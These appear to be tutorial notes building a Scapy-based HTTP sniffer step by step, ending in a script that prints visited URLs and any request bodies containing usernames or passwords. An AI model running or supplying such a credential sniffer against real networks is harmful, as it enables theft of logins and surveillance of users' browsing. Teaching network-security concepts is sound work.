PACKET_SNIFFER

- Capture data flowing through an interface.

- Filter this data.

- Display interesting information such as:

    - Login info (username and password).

    - Visited websites.

    - Images.

    - ...etc

CAPTURE & FILTER DATA

- Scapy provides a sniff function.

- It can capture data sent to or from the interface passed as iface.

- It can call the function specified in prn on each captured packet.
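
The callback mechanism described above can be sketched roughly as follows. This is only an illustration, not the script developed later in these notes: the helper names make_collector and run_sniffer, the limit of 5 packets and the eth0 interface are assumptions. The sniff arguments iface, store, prn and count, and the packet method summary(), are existing Scapy names.

```python
def make_collector(summaries):
    """Return a callback suitable for sniff(prn=...).

    make_collector is a hypothetical helper: the callback it returns
    appends a one-line summary of each packet to the given list.
    """
    def handle_packet(packet):
        # Scapy passes every captured packet to the prn callback.
        summaries.append(packet.summary())
    return handle_packet


def run_sniffer(interface="eth0", limit=5):
    """Capture `limit` packets on `interface` (usually needs root)."""
    # Imported here so make_collector can be used without Scapy installed.
    from scapy.all import sniff

    summaries = []
    # store=False: do not keep packets in memory; prn: per-packet callback.
    sniff(iface=interface, store=False,
          prn=make_collector(summaries), count=limit)
    return summaries
```

Calling run_sniffer("eth0") would return up to five summary strings. Because the callback returns nothing, Scapy itself prints nothing for each packet.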

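Install the third-party package. Recent Scapy releases (2.4.3 and later) already include the HTTP layer as scapy.layers.http, so this step is only needed on older versions.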

pip install scapy_http



1. Write a Python script that sniffs every HTTP request packet carrying a Raw layer.

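    #!/usr/bin/env python
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest


    def sniff(interface):
        # store=False keeps packets out of memory; prn runs once per packet.
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


    def process_sniffed_packet(packet):
        # Only HTTP requests that carry a payload (Raw layer) are of interest.
        if packet.haslayer(HTTPRequest) and packet.haslayer(scapy.Raw):
            packet.show()  # show() prints the packet and returns None


    sniff("eth0")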

Execute the script and sniff the packets on eth0.



2. Filter the useful packets by printing only the load of the Raw layer.

    #!/usr/bin/env python
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest


    def sniff(interface):
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest) and packet.haslayer(scapy.Raw):
            # The Raw load holds the request body, e.g. submitted form data.
            print(packet[scapy.Raw].load)


    sniff("eth0")
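
To make the printed load easier to read, it can be split into its fields. The sketch below assumes the load is a URL-encoded form body, which is common for login forms but not guaranteed. The function name parse_form_load and the sample bytes are hypothetical; parse_qs comes from the Python standard library.

```python
from urllib.parse import parse_qs


def parse_form_load(load):
    """Decode a Raw load (bytes) and split it into form fields."""
    text = load.decode(errors="ignore")
    # parse_qs returns a dict mapping each field name to a list of values.
    return parse_qs(text)


# Hypothetical load, standing in for the bytes printed by the script.
sample_load = b"username=admin&password=secret123&Login=submit"
fields = parse_form_load(sample_load)
print(fields["username"][0], fields["password"][0])  # admin secret123
```

Loads that are not form-encoded (JSON, file uploads and so on) would need different handling.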

Execute the script and sniff the packets on eth0.

Rewrite the Python script to print only the loads that contain login-related keywords.

    #!/usr/bin/env python
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest


    def sniff(interface):
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest) and packet.haslayer(scapy.Raw):
            # The load is bytes; decode it before searching for keywords.
            load = packet[scapy.Raw].load.decode(errors="ignore")
            keywords = ["username", "user", "login", "password", "pass"]
            # Print the load once if any keyword appears in it.
            if any(keyword in load for keyword in keywords):
                print(load)


    sniff("eth0")
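
The keyword check can also be pulled out into a small function that works on plain bytes, which makes it easy to try without capturing traffic. This is a sketch under assumptions: the name get_login_info is hypothetical, and the case-insensitive comparison is a variation that the script above does not perform.

```python
KEYWORDS = ["username", "user", "login", "password", "pass"]


def get_login_info(load, keywords=KEYWORDS):
    """Return the decoded load if it contains any keyword, else None."""
    text = load.decode(errors="ignore")
    # Compare in lower case so "Login" and "PASSWORD" also match.
    lowered = text.lower()
    if any(keyword in lowered for keyword in keywords):
        return text
    return None


# Hypothetical loads for illustration.
print(get_login_info(b"uname=alice&Pass=hunter2"))  # uname=alice&Pass=hunter2
print(get_login_info(b"q=weather+today"))           # None
```

Substring matching is deliberately loose, so it will also flag loads that merely mention a keyword, such as a search for "password reset".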

Add a feature: extract the URL of each HTTP request.

    #!/usr/bin/env python
    import scapy.all as scapy
    from scapy.layers.http import HTTPRequest


    def sniff(interface):
        scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


    def process_sniffed_packet(packet):
        if packet.haslayer(HTTPRequest):
            # Host and Path are bytes; join them and decode for printing.
            url = packet[HTTPRequest].Host + packet[HTTPRequest].Path
            print(url.decode(errors="ignore"))
            if packet.haslayer(scapy.Raw):
                load = packet[scapy.Raw].load.decode(errors="ignore")
                keywords = ["username", "user", "login", "password", "pass"]
                # Print the load once if any keyword appears in it.
                if any(keyword in load for keyword in keywords):
                    print(load)


    sniff("eth0")
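
The URL step joins two byte strings taken from the request. A minimal sketch of that step on its own, assuming both values arrive as bytes and either may be missing on a malformed request; build_url and the sample values are hypothetical names used only for illustration.

```python
def build_url(host, path):
    """Join the Host header and request path (both bytes) into a str."""
    # Either field can be None on malformed requests, so fall back to b"".
    return ((host or b"") + (path or b"")).decode(errors="ignore")


# Hypothetical values standing in for the Host and Path fields of a request.
print(build_url(b"example.com", b"/login.php"))  # example.com/login.php
```

Guarding against None avoids a TypeError in the callback, which would otherwise interrupt the capture on the first request without a Host header.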